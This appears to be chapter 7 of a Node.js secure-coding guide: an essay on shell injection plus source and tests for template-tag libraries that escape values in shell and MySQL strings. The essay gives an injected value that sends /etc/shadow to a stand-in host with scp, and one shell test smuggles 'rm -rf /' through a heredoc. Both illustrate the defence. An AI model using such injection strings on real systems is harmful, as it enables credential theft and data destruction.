/chapter-7/child-processes.md:
--------------------------------------------------------------------------------
 1 | # Shell injection
 2 | 
 3 | Threats: [SHP][]
 4 | 
 5 | The [`shelljs` module][shelljs] allows access to the system
 6 | shell.  We focus on `shelljs`, but similar arguments apply to builtins
 7 | like `child_process.spawn(cmd, { shell: ... })` ([docs][cp.spawn]) and
 8 | similar modules.
 9 | 
10 | `shelljs` has some nice programmatic APIs for common shell commands
11 | that escape arguments.
12 | 
13 | It also provides `shell.exec` which allows full access to the shell
14 | including interpretation of shell meta characters.
15 | 
16 | Solving [shell injection][SHP] is a much harder problem than query
17 | injection since shell scripts tend to call other shell scripts, so
18 | properly escaping arguments to one script doesn't help if the script
19 | sloppily composes a sub-shell.  The problem of tools that trust their
20 | inputs is not limited to shell scripts: see discussion of image decoders
21 | in [BOF][].
22 | 
23 | The [shell grammar][] has more layers of interpretation so is arguably
24 | more complex than any one SQL grammar.
25 | 
26 | We can do much better than string concatenation though.  The code
27 | below is vulnerable.
28 | 
29 | ```js
30 | shelljs.exec("executable '" + x + "'")
31 | ```
32 | 
33 | If an attacker causes
34 | 
35 | ```js
36 | x = " '; scp /etc/shadow evil@evil.org/; echo ' ";
37 | ```
38 | 
39 | then what gets passed to the shell is
40 | 
41 | ```js
42 | executable ' '; scp /etc/shadow evil@evil.org/; echo ' '
43 | ```
44 | 
45 | Instead, consider:
46 | 
47 | ```js
48 | shelljs.exec`executable ${x}`
49 | 
50 | shelljs.exec`executable '${x}'`
51 | ```
52 | 
53 | This use of tagged templates is roughly equivalent to
54 | 
55 | ```js
56 | shelljs.exec(["executable ", ""], x)
57 | 
58 | shelljs.exec(["executable \'", "\'"], x)
59 | ```
60 | 
61 | This way, when control reaches `shelljs`, it knows which strings came
62 | from the developer: `["executable ", ""]`, and which are inline
63 | expressions: `x`.  If `shelljs` properly escapes the latter, it
64 | prevents the breach above.
65 | 
66 | The accompanying example ([code][sh-code]) includes a tag
67 | implementation for `sh` and `bash` that recognizes complex nesting
68 | semantics.
69 | 
70 | We can't, working within the confines of Node, prevent poorly written
71 | command line tools from breaking when exposed to untrusted inputs, but
72 | we can make sure that we preserve the developer's intent when they
73 | write code that invokes command line tools.  For projects that have
74 | legitimate reasons for invoking sub-shells, consistently using
75 | template tags like this solves some problems and makes it more likely
76 | that effort spent hardening command line tools will yield fruit.
77 | 
78 | [shell grammar]: http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_10
79 | [shelljs]: https://www.npmjs.com/package/shelljs
80 | [cp.spawn]: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options
81 | [SHP]: ../chapter-1/threat-SHP.md
82 | [BOF]: ../chapter-1/threat-BOF.md
83 | [sh-code]: https://github.com/mikesamuel/sh-template-tag
84 | 


--------------------------------------------------------------------------------
/chapter-7/examples/sh/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "sh-template-tag",
 3 |   "description": "string template tags for safely composing shell strings",
 4 |   "keywords": [
 5 |     "shell",
 6 |     "child_process",
 7 |     "security",
 8 |     "injection",
 9 |     "template",
10 |     "template-tag",
11 |     "string-template",
12 |     "sec-roadmap",
13 |     "es6"
14 |   ],
15 |   "version": "0.0.0",
16 |   "author": "Mike Samuel",
17 |   "license": "Apache-2.0",
18 |   "main": "index.js",
19 |   "files": [
20 |     "index.js"
21 |   ],
22 |   "dependencies": {
23 |     "template-tag-common": ">=1.0.2"
24 |   },
25 |   "devDependencies": {
26 |     "chai": ">=4.1.2",
27 |     "eslint": ">=4.15.0",
28 |     "eslint-config-strict": "*",
29 |     "eslint-config-standard": "*",
30 |     "mocha": ">=4.0.1",
31 |     "standard": "*"
32 |   },
33 |   "scripts": {
34 |     "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && ./node_modules/.bin/mocha"
35 |   },
36 |   "eslintConfig": {
37 |     "extends": [
38 |       "strict",
39 |       "standard"
40 |     ]
41 |   }
42 | }
43 | 


--------------------------------------------------------------------------------
/chapter-7/examples/sh/test/test.js:
--------------------------------------------------------------------------------
  1 | /**
  2 |  * @license
  3 |  * Copyright 2017 Google LLC
  4 |  *
  5 |  * Licensed under the Apache License, Version 2.0 (the "License");
  6 |  * you may not use this file except in compliance with the License.
  7 |  * You may obtain a copy of the License at
  8 |  *
  9 |  *     https://www.apache.org/licenses/LICENSE-2.0
 10 |  *
 11 |  * Unless required by applicable law or agreed to in writing, software
 12 |  * distributed under the License is distributed on an "AS IS" BASIS,
 13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 14 |  * See the License for the specific language governing permissions and
 15 |  * limitations under the License.
 16 |  */
 17 | 
 18 | /* eslint "id-length": off */
 19 | 
 20 | const { expect } = require('chai')
 21 | const { describe, it } = require('mocha')
 22 | const { sh, ShFragment, makeLexer } = require('../index')
 23 | 
 24 | /**
 25 |  * Feeds chunks to the lexer and concatenates contexts.
 26 |  * Tests that the lexer ends in a valid end state and
 27 |  * appends '_ERR_' as an end state if not.
 28 |  */
 29 | function tokens (...chunks) {
 30 |   const lexer = makeLexer()
 31 |   const out = []
 32 |   for (let i = 0, len = chunks.length; i < len; ++i) {
 33 |     out.push(lexer(chunks[i])[0] || '_')
 34 |   }
 35 |   try {
 36 |     lexer(null)
 37 |   } catch (exc) {
 38 |     out.push('_ERR_')
 39 |   }
 40 |   return out.join(',')
 41 | }
 42 | 
 43 | // Unwrap an ShFragment, failing if the result is not one.
 44 | function unwrap (x) {
 45 |   if (x instanceof ShFragment) {
 46 |     return String(x)
 47 |   }
 48 |   throw new Error(`Expected ShFragment not ${JSON.stringify(x)}`)
 49 | }
 50 | 
 51 | // Run a test multiply  to exercise the memoizing code.
 52 | function runShTest (golden, test) {
 53 |   for (let i = 3; --i >= 0;) {
 54 |     if (golden === '_ERR_') {
 55 |       expect(test).to.throw()
 56 |     } else {
 57 |       expect(unwrap(test())).to.equal(golden)
 58 |     }
 59 |   }
 60 | }
 61 | 
 62 | describe('sh template tags', () => {
 63 |   describe('lexer', () => {
 64 |     it('empty string', () => {
 65 |       expect(tokens('')).to.equal('_')
 66 |     })
 67 |     it('word', () => {
 68 |       expect(tokens('foo')).to.equal('_')
 69 |     })
 70 |     it('words', () => {
 71 |       expect(tokens('foo bar baz')).to.equal('_')
 72 |     })
 73 |     it('words split', () => {
 74 |       expect(tokens('foo bar', ' ', 'baz')).to.equal('_,_,_')
 75 |     })
 76 |     it('parens', () => {
 77 |       expect(tokens('foo (bar) baz')).to.equal('_')
 78 |     })
 79 |     it('parens split', () => {
 80 |       expect('_,_,(,_,_,_').to.equal(
 81 |         tokens('foo', ', ', '(bar', ')', ' ', 'baz'))
 82 |     })
 83 |     it('parens hanging split', () => {
 84 |       expect('_,_,(,(,(,_ERR_').to.equal(
 85 |         tokens('foo', ', ', '(bar', ' ', 'baz'))
 86 |     })
 87 |     it('quotes embed subshell', () => {
 88 |       expect('",$(,_').to.equal(
 89 |         tokens(' "foo', '$(bar ', ' baz)" boo'))
 90 |     })
 91 |     it('quotes embed arithshell', () => {
 92 |       expect('",$((,$((,",_').to.equal(
 93 |         tokens(' "foo', '$((bar ', '(far)', ' baz))', 'q" boo'))
 94 |     })
 95 |     it('quotes embed backticks', () => {
 96 |       expect('",`,`,",_').to.equal(
 97 |         tokens(' "foo', '`bar ', '(far)', ' baz`', 'q" boo'))
 98 |     })
 99 |     it('escape affects subshell', () => {
100 |       expect('",",",",_').to.equal(
101 |         tokens(' "foo', '\\$((bar ', '(far)', ' baz))', 'q" boo'))
102 |     })
103 |     it('single quotes do not embed', () => {
104 |       expect(`',',',',_`).to.equal(
105 |         tokens(
106 |           ' \' $(',
107 |           'foo) $((',
108 |           'bar))',
109 |           ' `',
110 |           ' ` # \' '))
111 |     })
112 |     it('unterminated comment', () => {
113 |       expect('#,_ERR_').to.equal(
114 |         tokens(' #foo'))
115 |     })
116 |     it('terminated comment', () => {
117 |       expect('_').to.equal(
118 |         tokens(' #foo\n'))
119 |     })
120 |     it('terminated comment split', () => {
121 |       expect('#,_').to.equal(
122 |         tokens(' #foo', 'bar\n'))
123 |     })
124 |     it('arithshell', () => {
125 |       expect('_,$((,$((,_,_').to.equal(
126 |         tokens('foo', ' $((bar ', '(far)', ' baz))', ' boo'))
127 |     })
128 |     it('backticks', () => {
129 |       expect('_,`,`,_,_').to.equal(
130 |         tokens('foo', '`bar ', '(far)', ' baz`', ' boo'))
131 |     })
132 |     it('subshell paren disambiguation', () => {
133 |       expect('$(,(,$(,",_,_').to.equal(tokens(
134 |         'echo "$(foo ', ' | (bar ', ' baz)', ' boo)', 'far" | ', ''))
135 |     })
136 |     it('hash not after space', () => {
137 |       expect('_,_').to.equal(
138 |         tokens('echo foo#', ''))
139 |     })
140 |     it('hash after space', () => {
141 |       expect('#,#,_ERR_').to.equal(
142 |         tokens('echo foo #', ''))
143 |     })
144 |     it('hash concatenation hazard', () => {
145 |       expect(() => tokens('#foo')).to.throw()
146 |     })
147 |     it('intermediate concatenation hazard', () => {
148 |       expect(() => tokens('echo foo', '#bar')).to.throw()
149 |     })
150 |     it('escaped intermediate concatenation hazard', () => {
151 |       expect('_,_').to.equal(tokens(
152 |         'echo foo', '\\#bar'))
153 |     })
154 |     it('simple heredoc', () => {
155 |       expect(tokens('cat <<EOF\nFoo bar\nEOF\n')).to.equal('_')
156 |     })
157 |     it('heredoc hazard', () => {
158 |       // Concatenation hazard when no eol at end
159 |       expect(tokens('cat <<EOF\nFoo bar\nEOF')).to.equal('<<EOF,_ERR_')
160 |     })
161 |     it('split heredoc', () => {
162 |       expect(tokens('cat <<EOF\nFoo', ' bar\nEOF\n')).to.equal('<<EOF,_')
163 |     })
164 |     it('split heredoc sp', () => {
165 |       expect(tokens('cat << EOF\nFoo', ' bar\nEOF\n')).to.equal('<<EOF,_')
166 |     })
167 |     it('split heredoc-', () => {
168 |       expect(tokens('cat <<-EOF\nFoo', ' bar\nEOF\n')).to.equal('<<-EOF,_')
169 |     })
170 |     it('bad heredoc label', () => {
171 |       expect(() => tokens('cat << "EOF"\nFoo bar\nEOF;')).to.throw()
172 |     })
173 |     it('missing heredoc label', () => {
174 |       expect(() => tokens('cat <<', '\nfoo bar\n', ';')).to.throw()
175 |     })
176 |   })
177 | 
178 |   const str = 'a"\'\n\\$b'
179 |   const numb = 1234
180 |   const frag = new ShFragment(' frag ')
181 |   describe('template tag', () => {
182 |     it('string in top level', () => {
183 |       runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo ${str}`)
184 |     })
185 |     it('number in top level', () => {
186 |       runShTest(`echo '1234'`, () => sh`echo ${numb}`)
187 |     })
188 |     it('fragment in top level', () => {
189 |       runShTest(`echo  frag `, () => sh`echo ${frag}`)
190 |     })
191 |     it('string in dq', () => {
192 |       runShTest(`echo "a\\"'\n\\\\\\$b"`, () => sh`echo "${str}"`)
193 |     })
194 |     it('number in dq', () => {
195 |       runShTest(`echo "1234"`, () => sh`echo "${numb}"`)
196 |     })
197 |     it('fragment in dq', () => {
198 |       runShTest(`echo " frag "`, () => sh`echo "${frag}"`)
199 |     })
200 |     it('string in sq', () => {
201 |       runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo '${str}'`)
202 |     })
203 |     it('number in sq', () => {
204 |       runShTest(`echo '1234'`, () => sh`echo '${numb}'`)
205 |     })
206 |     it('fragment in sq', () => {
207 |       runShTest(`echo ' frag '`, () => sh`echo '${frag}'`)
208 |     })
209 |     it('string in embed', () => {
210 |       runShTest(
211 |         `echo $(echo 'a"'"'"'\n\\$b')`,
212 |         () => sh`echo $(echo ${str})`)
213 |     })
214 |     it('number in embed', () => {
215 |       runShTest(
216 |         `echo $(echo '1234')`,
217 |         () => sh`echo $(echo ${numb})`)
218 |     })
219 |     it('fragment in embed', () => {
220 |       runShTest(
221 |         `echo $(echo  frag )`,
222 |         () => sh`echo $(echo ${frag})`)
223 |     })
224 |     it('hash ambig string', () => {
225 |       runShTest(`_ERR_`, () => sh`echo foo${str}#bar`)
226 |     })
227 |     it('hash ambig fragment', () => {
228 |       runShTest(`_ERR_`, () => sh`echo foo${frag}#bar`)
229 |     })
230 |     it('heredoc string', () => {
231 |       runShTest(
232 |         '\ncat <<EOF\na"\'\n\\$b\nEOF\n',
233 |         () => sh`
234 | cat <<EOF
235 | ${str}
236 | EOF
237 | `)
238 |     })
239 |     it('heredoc number', () => {
240 |       runShTest(
241 |         '\ncat <<EOF\n1234\nEOF\n',
242 |         () => sh`
243 | cat <<EOF
244 | ${numb}
245 | EOF
246 | `)
247 |     })
248 |     it('heredoc fragment', () => {
249 |       runShTest(
250 |         '\ncat <<EOF\n frag \nEOF\n',
251 |         () => sh`
252 | cat <<EOF
253 | ${frag}
254 | EOF
255 | `)
256 |     })
257 |     it('heredoc sneaky', () => {
258 |       runShTest(
259 |         `
260 | cat <<EOF_ZQHNfpzxDMLfdgCg8NUgxceUCSQiISNU1zQuqzI6uzs
261 | EOF
262 | rm -rf /
263 | cat <<EOF
264 | EOF_ZQHNfpzxDMLfdgCg8NUgxceUCSQiISNU1zQuqzI6uzs
265 | `,
266 | 
267 |         () => sh`
268 | cat <<EOF
269 | ${'EOF\nrm -rf /\ncat <<EOF'}
270 | EOF
271 | `)
272 |     })
273 |   })
274 | })
275 | 


--------------------------------------------------------------------------------
/chapter-7/examples/sql/index.js:
--------------------------------------------------------------------------------
  1 | /**
  2 |  * @license
  3 |  * Copyright 2017 Google LLC
  4 |  *
  5 |  * Licensed under the Apache License, Version 2.0 (the "License");
  6 |  * you may not use this file except in compliance with the License.
  7 |  * You may obtain a copy of the License at
  8 |  *
  9 |  *     https://www.apache.org/licenses/LICENSE-2.0
 10 |  *
 11 |  * Unless required by applicable law or agreed to in writing, software
 12 |  * distributed under the License is distributed on an "AS IS" BASIS,
 13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 14 |  * See the License for the specific language governing permissions and
 15 |  * limitations under the License.
 16 |  */
 17 | 
 18 | const mysql = require('mysql')
 19 | const {
 20 |   memoizedTagFunction,
 21 |   trimCommonWhitespaceFromLines,
 22 |   TypedString
 23 | } = require('template-tag-common')
 24 | 
 25 | // A simple lexer for SQL.
 26 | // SQL has many divergent dialects with subtly different
 27 | // conventions for string escaping and comments.
 28 | // This just attempts to roughly tokenize MySQL's specific variant.
 29 | // See also
 30 | // https://www.w3.org/2005/05/22-SPARQL-MySQL/sql_yacc
 31 | // https://github.com/twitter/mysql/blob/master/sql/sql_lex.cc
 32 | // https://dev.mysql.com/doc/refman/5.7/en/string-literals.html
 33 | 
 34 | // "--" followed by whitespace starts a line comment
 35 | // "#"
 36 | // "/*" starts an inline comment ended at first "*/"
 37 | // \N means null
 38 | // Prefixed strings x'...' is a hex string,  b'...' is a binary string, ....
 39 | // '...', "..." are strings.  `...` escapes identifiers.
 40 | // doubled delimiters and backslash both escape
 41 | // doubled delimiters work in `...` identifiers
 42 | 
 43 | const PREFIX_BEFORE_DELIMITER = new RegExp(
 44 |   '^(?:' +
 45 |     (
 46 |       // Comment
 47 |       '--(?=[\\t\\r\\n ])[^\\r\\n]*' +
 48 |       '|#[^\\r\\n]*' +
 49 |       '|/[*][\\s\\S]*?[*]/'
 50 |     ) +
 51 |     '|' +
 52 |     (
 53 |       // Run of non-comment non-string starts
 54 |       '(?:[^\'"`\\-/#]|-(?!-)|/(?![*]))'
 55 |     ) +
 56 |     ')*')
 57 | const DELIMITED_BODIES = {
 58 |   '\'': /^(?:[^'\\]|\\[\s\S]|'')*/,
 59 |   '"': /^(?:[^"\\]|\\[\s\S]|"")*/,
 60 |   '`': /^(?:[^`\\]|\\[\s\S]|``)*/
 61 | }
 62 | 
 63 | /** Template tag that creates a new Error with a message. */
 64 | function msg (strs, ...dyn) {
 65 |   let message = String(strs[0])
 66 |   for (let i = 0; i < dyn.length; ++i) {
 67 |     message += JSON.stringify(dyn[i]) + strs[i + 1]
 68 |   }
 69 |   return message
 70 | }
 71 | 
 72 | /**
 73 |  * Returns a function that can be fed chunks of input and which
 74 |  * returns a delimiter context.
 75 |  */
 76 | function makeLexer () {
 77 |   let errorMessage = null
 78 |   let delimiter = null
 79 |   return (text) => {
 80 |     if (errorMessage) {
 81 |       // Replay the error message if we've already failed.
 82 |       throw new Error(errorMessage)
 83 |     }
 84 |     text = String(text)
 85 |     while (text) {
 86 |       const pattern = delimiter
 87 |         ? DELIMITED_BODIES[delimiter]
 88 |         : PREFIX_BEFORE_DELIMITER
 89 |       const match = pattern.exec(text)
 90 |       if (!match) {
 91 |         throw new Error(
 92 |           errorMessage = msg`Failed to lex starting at ${text}`)
 93 |       }
 94 |       let nConsumed = match[0].length
 95 |       if (text.length > nConsumed) {
 96 |         const chr = text.charAt(nConsumed)
 97 |         if (delimiter) {
 98 |           if (chr === delimiter) {
 99 |             delimiter = null
100 |             ++nConsumed
101 |           } else {
102 |             throw new Error(
103 |               errorMessage = msg`Expected ${chr} at ${text}`)
104 |           }
105 |         } else if (Object.hasOwnProperty.call(DELIMITED_BODIES, chr)) {
106 |           delimiter = chr
107 |           ++nConsumed
108 |         } else {
109 |           throw new Error(
110 |             errorMessage = msg`Expected delimiter at ${text}`)
111 |         }
112 |       }
113 |       text = text.substring(nConsumed)
114 |     }
115 |     return delimiter
116 |   }
117 | }
118 | 
119 | /** A string wrapper that marks its content as a SQL identifier. */
120 | class Identifier extends TypedString {}
121 | 
122 | /**
123 |  * A string wrapper that marks its content as a series of
124 |  * well-formed SQL tokens.
125 |  */
126 | class SqlFragment extends TypedString {}
127 | 
128 | /**
129 |  * Analyzes the static parts of the tag content.
130 |  *
131 |  * @return An record like { delimiters, chunks }
132 |  *     where delimiter is a contextual cue and chunk is
133 |  *     the adjusted raw text.
134 |  */
135 | function computeStatic (strings) {
136 |   const { raw } = trimCommonWhitespaceFromLines(strings)
137 | 
138 |   const delimiters = []
139 |   const chunks = []
140 | 
141 |   const lexer = makeLexer()
142 | 
143 |   let delimiter = null
144 |   for (let i = 0, len = raw.length; i < len; ++i) {
145 |     let chunk = String(raw[i])
146 |     if (delimiter === '`') {
147 |       // Treat raw \` in an identifier literal as an ending delimiter.
148 |       chunk = chunk.replace(/^([^\\`]|\\[\s\S])*\\`/, '$1`')
149 |     }
150 |     const newDelimiter = lexer(chunk)
151 |     if (newDelimiter === '`' && !delimiter) {
152 |       // Treat literal \` outside a string context as starting an
153 |       // identifier literal
154 |       chunk = chunk.replace(
155 |         /((?:^|[^\\])(?:\\\\)*)\\(`(?:[^`\\]|\\[\s\S])*)$/, '$1$2')
156 |     }
157 | 
158 |     chunks.push(chunk)
159 |     delimiters.push(newDelimiter)
160 |     delimiter = newDelimiter
161 |   }
162 | 
163 |   if (delimiter) {
164 |     throw new Error(`Unclosed quoted string: ${delimiter}`)
165 |   }
166 | 
167 |   return { raw, delimiters, chunks }
168 | }
169 | 
170 | function interpolateSqlIntoFragment (
171 |   { raw, delimiters, chunks }, strings, values) {
172 |   // A buffer to accumulate output.
173 |   let [ result ] = chunks
174 |   for (let i = 1, len = raw.length; i < len; ++i) {
175 |     const chunk = chunks[i]
176 |     // The count of values must be 1 less than the surrounding
177 |     // chunks of literal text.
178 |     if (i !== 0) {
179 |       const delimiter = delimiters[i - 1]
180 |       const value = values[i - 1]
181 |       if (delimiter) {
182 |         result += escapeDelimitedValue(value, delimiter)
183 |       } else {
184 |         result = appendValue(result, value, chunk)
185 |       }
186 |     }
187 | 
188 |     result += chunk
189 |   }
190 | 
191 |   return new SqlFragment(result)
192 | }
193 | 
194 | function escapeDelimitedValue (value, delimiter) {
195 |   if (delimiter === '`') {
196 |     return mysql.escapeId(String(value)).replace(/^`|`$/g, '')
197 |   }
198 |   const escaped = mysql.escape(String(value))
199 |   return escaped.substring(1, escaped.length - 1)
200 | }
201 | 
202 | function appendValue (resultBefore, value, chunk) {
203 |   let needsSpace = false
204 |   let result = resultBefore
205 |   const valueArray = Array.isArray(value) ? value : [ value ]
206 |   for (let i = 0, nValues = valueArray.length; i < nValues; ++i) {
207 |     if (i) {
208 |       result += ', '
209 |     }
210 | 
211 |     const one = valueArray[i]
212 |     let valueStr = null
213 |     if (one instanceof SqlFragment) {
214 |       if (!/(?:^|[\n\r\t ,\x28])$/.test(result)) {
215 |         result += ' '
216 |       }
217 |       valueStr = one.toString()
218 |       needsSpace = i + 1 === nValues
219 |     } else if (one instanceof Identifier) {
220 |       valueStr = mysql.escapeId(one.toString())
221 |     } else {
222 |       // If we need to handle nested arrays, we would recurse here.
223 |       valueStr = mysql.format('?', one)
224 |     }
225 |     result += valueStr
226 |   }
227 | 
228 |   if (needsSpace && chunk && !/^[\n\r\t ,\x29]/.test(chunk)) {
229 |     result += ' '
230 |   }
231 | 
232 |   return result
233 | }
234 | 
235 | /**
236 |  * Template tag function that contextually autoescapes values
237 |  * producing a SqlFragment.
238 |  */
239 | const sql = memoizedTagFunction(computeStatic, interpolateSqlIntoFragment)
240 | 
241 | exports.Identifier = Identifier
242 | exports.SqlFragment = SqlFragment
243 | exports.sql = sql
244 | 
245 | if (global.it) {
246 |   // Expose for testing.
247 |   // Harmless if this leaks
248 |   exports.makeLexer = makeLexer
249 | }
250 | 


--------------------------------------------------------------------------------
/chapter-7/examples/sql/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "mysql-template-tag",
 3 |   "description": "string template tags for safely composing SQL",
 4 |   "keywords": [
 5 |     "sql",
 6 |     "security",
 7 |     "injection",
 8 |     "template",
 9 |     "template-tag",
10 |     "string-template",
11 |     "sec-roadmap",
12 |     "es6"
13 |   ],
14 |   "version": "0.0.0",
15 |   "author": "Mike Samuel",
16 |   "license": "Apache-2.0",
17 |   "main": "index.js",
18 |   "files": [
19 |     "index.js"
20 |   ],
21 |   "dependencies": {
22 |     "mysql": "2.15.0",
23 |     "template-tag-common": ">=1.0.2"
24 |   },
25 |   "devDependencies": {
26 |     "chai": ">=4.1.2",
27 |     "eslint": ">=4.15.0",
28 |     "eslint-config-strict": "*",
29 |     "eslint-config-standard": "*",
30 |     "mocha": ">=4.0.1",
31 |     "standard": "*"
32 |   },
33 |   "scripts": {
34 |     "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && TZ=GMT ./node_modules/.bin/mocha"
35 |   },
36 |   "eslintConfig": {
37 |     "extends": [
38 |       "strict",
39 |       "standard"
40 |     ]
41 |   }
42 | }
43 | 


--------------------------------------------------------------------------------
/chapter-7/examples/sql/test/test.js:
--------------------------------------------------------------------------------
  1 | /**
  2 |  * @license
  3 |  * Copyright 2017 Google LLC
  4 |  *
  5 |  * Licensed under the Apache License, Version 2.0 (the "License");
  6 |  * you may not use this file except in compliance with the License.
  7 |  * You may obtain a copy of the License at
  8 |  *
  9 |  *     https://www.apache.org/licenses/LICENSE-2.0
 10 |  *
 11 |  * Unless required by applicable law or agreed to in writing, software
 12 |  * distributed under the License is distributed on an "AS IS" BASIS,
 13 |  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 14 |  * See the License for the specific language governing permissions and
 15 |  * limitations under the License.
 16 |  */
 17 | 
 18 | /* eslint "no-magic-numbers": off */
 19 | 
 20 | const { expect } = require('chai')
 21 | const { describe, it } = require('mocha')
 22 | const index = require('../index')
 23 | 
 24 | function tokens (...chunks) {
 25 |   const lexer = index.makeLexer()
 26 |   const out = []
 27 |   for (let i = 0, len = chunks.length; i < len; ++i) {
 28 |     out.push(lexer(chunks[i]) || '_')
 29 |   }
 30 |   return out.join(',')
 31 | }
 32 | 
 33 | describe('sql template tags', () => {
 34 |   describe('lexer', () => {
 35 |     it('empty string', () => {
 36 |       expect(tokens('')).to.equal('_')
 37 |     })
 38 |     it('hash comments', () => {
 39 |       expect(tokens(' # "foo\n', '')).to.equal('_,_')
 40 |     })
 41 |     it('dash comments', () => {
 42 |       expect(tokens(' -- \'foo\n', '')).to.equal('_,_')
 43 |     })
 44 |     it('block comments', () => {
 45 |       expect(tokens(' /* `foo */', '')).to.equal('_,_')
 46 |     })
 47 |     it('dq', () => {
 48 |       expect(tokens('SELECT "foo"')).to.equal('_')
 49 |       expect(tokens('SELECT `foo`, "foo"')).to.equal('_')
 50 |       expect(tokens('SELECT "', '"')).to.equal('",_')
 51 |       expect(tokens('SELECT "x', '"')).to.equal('",_')
 52 |       expect(tokens('SELECT "\'', '"')).to.equal('",_')
 53 |       expect(tokens('SELECT "`', '"')).to.equal('",_')
 54 |       expect(tokens('SELECT """', '"')).to.equal('",_')
 55 |       expect(tokens('SELECT "\\"', '"')).to.equal('",_')
 56 |     })
 57 |     it('sq', () => {
 58 |       expect(tokens('SELECT \'foo\'')).to.equal('_')
 59 |       expect(tokens('SELECT `foo`, \'foo\'')).to.equal('_')
 60 |       expect(tokens('SELECT \'', '\'')).to.equal('\',_')
 61 |       expect(tokens('SELECT \'x', '\'')).to.equal('\',_')
 62 |       expect(tokens('SELECT \'"', '\'')).to.equal('\',_')
 63 |       expect(tokens('SELECT \'`', '\'')).to.equal('\',_')
 64 |       expect(tokens('SELECT \'\'\'', '\'')).to.equal('\',_')
 65 |       expect(tokens('SELECT \'\\\'', '\'')).to.equal('\',_')
 66 |     })
 67 |     it('bq', () => {
 68 |       expect(tokens('SELECT `foo`')).to.equal('_')
 69 |       expect(tokens('SELECT "foo", `foo`')).to.equal('_')
 70 |       expect(tokens('SELECT `', '`')).to.equal('`,_')
 71 |       expect(tokens('SELECT `x', '`')).to.equal('`,_')
 72 |       expect(tokens('SELECT `\'', '`')).to.equal('`,_')
 73 |       expect(tokens('SELECT `"', '`')).to.equal('`,_')
 74 |       expect(tokens('SELECT ```', '`')).to.equal('`,_')
 75 |       expect(tokens('SELECT `\\`', '`')).to.equal('`,_')
 76 |     })
 77 |   })
 78 | 
 79 |   function runTagTest (golden, test) {
 80 |     // Run multiply to test memoization bugs.
 81 |     for (let i = 3; --i >= 0;) {
 82 |       let result = test()
 83 |       if (result instanceof index.SqlFragment) {
 84 |         result = result.toString()
 85 |       } else {
 86 |         throw new Error(`Expected SqlFragment not ${result}`)
 87 |       }
 88 |       expect(result).to.equal(golden)
 89 |     }
 90 |   }
 91 | 
 92 |   describe('sql', () => {
 93 |     it('numbers', () => {
 94 |       runTagTest(
 95 |         'SELECT 2',
 96 |         () => index.sql`SELECT ${1 + 1}`)
 97 |     })
 98 |     it('date', () => {
 99 |       runTagTest(
100 |         `SELECT '2000-01-01 00:00:00.000'`,
101 |         () => index.sql`SELECT ${new Date(Date.UTC(2000, 0, 1, 0, 0, 0))}`)
102 |     })
103 |     it('string', () => {
104 |       runTagTest(
105 |         `SELECT 'Hello, World!\\n'`,
106 |         () => index.sql`SELECT ${'Hello, World!\n'}`)
107 |     })
108 |     it('identifier', () => {
109 |       runTagTest(
110 |         'SELECT `foo`',
111 |         () => index.sql`SELECT ${new index.Identifier('foo')}`)
112 |     })
113 |     it('fragment', () => {
114 |       const fragment = new index.SqlFragment('1 + 1')
115 |       runTagTest(
116 |         `SELECT 1 + 1`,
117 |         () => index.sql`SELECT ${fragment}`)
118 |     })
119 |     it('fragment no token merging', () => {
120 |       const fragment = new index.SqlFragment('1 + 1')
121 |       runTagTest(
122 |         `SELECT 1 + 1 FROM T`,
123 |         () => index.sql`SELECT${fragment}FROM T`)
124 |     })
125 |     it('string in dq string', () => {
126 |       runTagTest(
127 |         `SELECT "Hello, World!\\n"`,
128 |         () => index.sql`SELECT "Hello, ${'World!'}\n"`)
129 |     })
130 |     it('string in sq string', () => {
131 |       runTagTest(
132 |         `SELECT 'Hello, World!\\n'`,
133 |         () => index.sql`SELECT 'Hello, ${'World!'}\n'`)
134 |     })
135 |     it('string after string in string', () => {
136 |       // The following tests check obliquely that '?' is not
137 |       // interpreted as a prepared statement meta-character
138 |       // internally.
139 |       runTagTest(
140 |         `SELECT 'Hello', "World?"`,
141 |         () => index.sql`SELECT '${'Hello'}', "World?"`)
142 |     })
143 |     it('string before string in string', () => {
144 |       runTagTest(
145 |         `SELECT 'Hello?', 'World?'`,
146 |         () => index.sql`SELECT 'Hello?', '${'World?'}'`)
147 |     })
148 |     it('number after string in string', () => {
149 |       runTagTest(
150 |         `SELECT 'Hello?', 123`,
151 |         () => index.sql`SELECT '${'Hello?'}', ${123}`)
152 |     })
153 |     it('number before string in string', () => {
154 |       runTagTest(
155 |         `SELECT 123, 'World?'`,
156 |         () => index.sql`SELECT ${123}, '${'World?'}'`)
157 |     })
158 |     it('string in identifier', () => {
159 |       runTagTest(
160 |         'SELECT `foo`',
161 |         () => index.sql`SELECT \`${'foo'}\``)
162 |     })
163 |     it('number in identifier', () => {
164 |       runTagTest(
165 |         'SELECT `foo_123`',
166 |         () => index.sql`SELECT \`foo_${123}\``)
167 |     })
168 |     it('array', () => {
169 |       const id = new index.Identifier('foo')
170 |       const frag = new index.SqlFragment('1 + 1')
171 |       const values = [ 123, 'foo', id, frag ]
172 |       runTagTest(
173 |         "SELECT X FROM T WHERE X IN (123, 'foo', `foo`, 1 + 1)",
174 |         () => index.sql`SELECT X FROM T WHERE X IN (${values})`)
175 |     })
176 |   })
177 | })
178 | 


--------------------------------------------------------------------------------
/chapter-7/libraries.md:
--------------------------------------------------------------------------------
 1 | # Library support for Safe Coding Practices
 2 | 
 3 | The way we structure libraries and APIs affect the idioms that are
 4 | available to developers.
 5 | 
 6 | If the easiest ways to express ideas are also secure against a
 7 | particular class of attack, then developers who have seen ideas
 8 | expressed those ways will tend to produce code that is secure
 9 | against that class of attack.
10 | 
11 | Next, we introduce a few such idioms, show how they can be better
12 | addressed via a rarely used but powerful JavaScript
13 | feature, and end with some ideas on how to foster consistent,
14 | powerful, and secure APIs for a class of problems that often have
15 | security consequences: composing structured strings to send to
16 | external agents.
